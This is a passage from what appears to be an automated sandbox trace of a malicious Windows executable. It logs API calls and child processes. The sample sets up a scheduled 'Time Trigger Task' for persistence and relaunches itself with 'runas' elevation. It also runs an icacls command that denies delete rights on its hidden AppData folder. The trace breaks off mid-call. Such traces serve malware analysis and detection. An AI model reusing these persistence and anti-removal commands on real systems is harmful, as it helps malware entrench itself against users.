[0037.109] IActionCollection:Create (in: This=0x29209e0, Type=0, ppAction=0x18d834 | out: ppAction=0x18d834*=0x2920ca0) returned 0x0 [0037.110] IUnknown:Release (This=0x29209e0) returned 0x1 [0037.110] IUnknown:QueryInterface (in: This=0x2920ca0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18d850 | out: ppvObject=0x18d850*=0x2920ca0) returned 0x0 [0037.110] IUnknown:Release (This=0x2920ca0) returned 0x2 [0037.110] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x3249300 [0037.110] IExecAction:put_Path (This=0x2920ca0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe") returned 0x0 [0037.110] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3249300 | out: hHeap=0x6f0000) returned 1 [0037.110] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x3249300 [0037.110] IExecAction:put_Arguments (This=0x2920ca0, Arguments="--Task") returned 0x0 [0037.110] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3249300 | out: hHeap=0x6f0000) returned 1 [0037.110] IUnknown:Release (This=0x2920ca0) returned 0x1 [0037.110] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x3249300 [0037.110] ITaskFolder:RegisterTaskDefinition (in: This=0x9cff98, Path="Time Trigger Task", pDefinition=0x2920968, flags=6, UserId=0x18d2f0*(varType=0x0, wReserved1=0x325, wReserved2=0xd804, wReserved3=0x18, varVal1=0x420cab, varVal2=0x6f0000), password=0x18d300*(varType=0x0, wReserved1=0x0, wReserved2=0xf0, wReserved3=0x0, varVal1=0x77, varVal2=0x7), LogonType=3, sddl=0x18d314*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0xf8), ppTask=0x18d81c | out: ppTask=0x18d81c*=0x2920d10) returned 0x0 [0037.229] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3249300 | out: hHeap=0x6f0000) returned 1 [0037.229] TaskScheduler:IUnknown:Release (This=0x9cff98) returned 0x0 [0037.229] TaskScheduler:IUnknown:Release (This=0x2920968) returned 0x0 [0037.230] IUnknown:Release (This=0x2920d10) returned 0x0 [0037.230] CoUninitialize () [0037.233] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3231988 | out: hHeap=0x6f0000) returned 1 [0037.233] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32663d8 | out: hHeap=0x6f0000) returned 1 [0037.233] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7444a8 | out: hHeap=0x6f0000) returned 1 [0037.233] GetVersion () returned 0x1db10106 [0037.233] lstrcpyW (in: lpString1=0x18dc80, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0037.233] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0037.233] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0037.234] ShellExecuteExW (in: pExecInfo=0x18da44*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18da44*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0037.348] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3203f10 | out: hHeap=0x6f0000) returned 1 [0037.348] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32305e8 | out: hHeap=0x6f0000) returned 1 [0037.348] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x74d780 | out: hHeap=0x6f0000) returned 1 [0037.389] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x740498 | out: hHeap=0x6f0000) returned 1 [0037.389] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x710a08 | out: hHeap=0x6f0000) returned 1 [0037.389] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x325cfe0 | out: hHeap=0x6f0000) returned 1 [0037.389] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3265878 | out: hHeap=0x6f0000) returned 1 [0037.389] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x713fa0 | out: hHeap=0x6f0000) returned 1 [0037.395] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x712140 | out: hHeap=0x6f0000) returned 1 [0037.396] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18ed0c | out: phModule=0x18ed0c) returned 0 [0037.396] ExitProcess (uExitCode=0x0) [0037.437] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x327f328 | out: hHeap=0x6f0000) returned 1 [0037.437] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x711570 | out: hHeap=0x6f0000) returned 1 [0037.441] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0x900 Thread: id = 3 os_tid = 0x904 Thread: id = 4 os_tid = 0x908 Thread: id = 5 os_tid = 0x90c Thread: id = 6 os_tid = 0x910 Thread: id = 7 os_tid = 0x914 Thread: id = 21 os_tid = 0x920 Thread: id = 22 os_tid = 0x924 Thread: id = 31 os_tid = 0x934 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x15f04000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x8f0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dc17" [0xc000000f], "LOCAL" [0x7] Thread: id = 8 os_tid = 0x76c Thread: id = 9 os_tid = 0x758 Thread: id = 10 os_tid = 0x74c Thread: id = 11 os_tid = 0x72c Thread: id = 12 os_tid = 0x71c Thread: id = 13 os_tid = 0x718 Thread: id = 14 os_tid = 0x638 Thread: id = 15 os_tid = 0x154 Thread: id = 16 os_tid = 0x150 Thread: id = 17 os_tid = 0x128 Thread: id = 18 os_tid = 0x12c Thread: id = 19 os_tid = 0x120 Thread: id = 20 os_tid = 0x3fc Thread: id = 42 os_tid = 0x9b8 Thread: id = 135 os_tid = 0xba8 Thread: id = 187 os_tid = 0x804 Process: id = "3" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x4fd3d000" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x8f0" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0x92c Thread: id = 24 os_tid = 0x930 Process: id = "4" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x5e7f000" os_pid = "0x50c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x8f0" cmd_line = "taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0x578 Thread: id = 26 os_tid = 0x574 Thread: id = 27 os_tid = 0x53c Thread: id = 28 os_tid = 0x520 Thread: id = 29 os_tid = 0x514 Thread: id = 30 os_tid = 0x510 Thread: id = 43 os_tid = 0x9d0 Thread: id = 71 os_tid = 0xa70 Process: id = "5" image_name = "penelop0611_2019-11-06_10-30.exe_.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe" page_root = "0x5060c000" os_pid = "0x938" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x8f0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 32 os_tid = 0x93c [0037.576] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x151e31b0, dwHighDateTime=0x1d5956a)) [0037.576] GetCurrentThreadId () returned 0x93c [0037.576] GetCurrentProcessId () returned 0x938 [0037.576] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=15777391950) returned 1 [0037.611] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7714fd35, hStdError=0x771b7daf)) [0037.611] GetProcessHeap () returned 0x660000 [0037.612] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195 [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadStackGuarantee") returned 0x76c3d31f [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e [0037.612] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalProcessorInformation") returned 0x76cb4761 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesEx") returned 0x76cb424f [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatEx") returned 0x76cc6676 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatEx") returned 0x76cc65f1 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLocaleName") returned 0x76cb47c1 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocaleName") returned 0x76cb47e1 [0037.613] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0037.614] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0 [0037.614] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0 [0037.614] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0037.614] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0037.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3bc) returned 0x671ed0 [0037.614] GetCurrentThreadId () returned 0x93c [0037.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x6707b8 [0037.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x800) returned 0x672298 [0037.614] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405695, hStdOutput=0xb8ac412f, hStdError=0x0)) [0037.614] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0037.614] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0037.614] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0037.614] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" --Admin IsNotAutoStart IsNotTask" [0037.615] GetEnvironmentStringsW () returned 0x672aa0* [0037.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0037.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x565) returned 0x673578 [0037.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x673578, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0037.615] FreeEnvironmentStringsW (penv=0x672aa0) returned 1 [0037.615] GetLastError () returned 0x7f [0037.615] SetLastError (dwErrCode=0x7f) [0037.615] GetLastError () returned 0x7f [0037.615] SetLastError (dwErrCode=0x7f) [0037.615] GetLastError () returned 0x7f [0037.615] SetLastError (dwErrCode=0x7f) [0037.615] GetACP () returned 0x4e4 [0037.615] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x220) returned 0x673ae8 [0037.615] GetLastError () returned 0x7f [0037.615] SetLastError (dwErrCode=0x7f) [0037.615] IsValidCodePage (CodePage=0x4e4) returned 1 [0037.615] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fedc | out: lpCPInfo=0x18fedc) returned 1 [0037.615] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9a4 | out: lpCPInfo=0x18f9a4) returned 1 [0037.615] GetLastError () returned 0x7f [0037.615] SetLastError (dwErrCode=0x7f) [0037.615] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.615] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f728, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0037.615] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9b8 | out: lpCharType=0x18f9b8) returned 1 [0037.615] GetLastError () returned 0x7f [0037.615] SetLastError (dwErrCode=0x7f) [0037.615] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.615] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0037.616] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0037.616] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0037.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fcb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¯@¬¸ôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0037.616] GetLastError () returned 0x7f [0037.616] SetLastError (dwErrCode=0x7f) [0037.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, 